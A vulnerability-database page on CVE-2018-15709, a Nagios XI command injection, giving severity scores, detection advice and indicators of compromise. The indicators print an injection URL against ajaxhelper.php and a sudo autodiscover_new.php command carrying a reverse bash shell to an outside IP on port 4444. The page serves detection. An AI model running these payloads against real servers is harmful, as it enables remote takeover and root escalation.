cbcvebase.
CVE-2018-15709
published 2018-11-14

CVE-2018-15709: Nagios XI 5.5.6 allows remote authenticated attackers to execute arbitrary commands via a crafted HTTP request.

PriorityP264high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EPSS
21.02%
97.3th percentile
Nagios XI 5.5.6 allows remote authenticated attackers to execute arbitrary commands via a crafted HTTP request.

Affected

1 ranges
VendorProductVersion rangeFixed in
nagiosnagios_xi

Detection & IOCsextracted from sources · hover to see the quote

path/usr/local/nagiosxi/cron/cmdsubsys.php
urlhttps://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312
commandsudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.1.191/4444 0>&1;'
path/usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
  • Monitor HTTP requests to /nagiosxi/ajaxhelper.php with cmd=submitcommand and cmd value 1100 (COMMAND_NAGIOSXI_SET_HTACCESS), particularly inspecting the 'password' field in the opts JSON body for shell metacharacters (e.g., single quotes, semicolons).
  • Alert on execution of cmdsubsys.php spawning unexpected child processes or shell commands, as the subsystem passes unsanitized input directly to system().
  • Detect sudo invocations of autodiscover_new.php by the 'apache' or 'nagios' users, especially with --addresses parameters containing shell injection characters (semicolons, redirects, /bin/bash).
  • Watch for outbound TCP connections from the Nagios XI server to unexpected external IPs on port 4444, indicative of a reverse bash shell established via the autodiscover_new.php LPE chain.
  • Flag creation of unexpected files under /usr/local/nagiosxi/tmp/ (e.g., whoami.txt) as evidence of successful command injection via cmdsubsys.php.
  • ·The vulnerability is exploitable by low-privileged (non-admin) authenticated users, not just administrators, broadening the attacker surface beyond privileged accounts.
  • ·The sudoers configuration grants both the 'nagios' and 'apache' OS users passwordless sudo rights to autodiscover_new.php, meaning compromise of either user (e.g., via CVE-2018-15708 or CVE-2018-15709) is sufficient for full root escalation.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.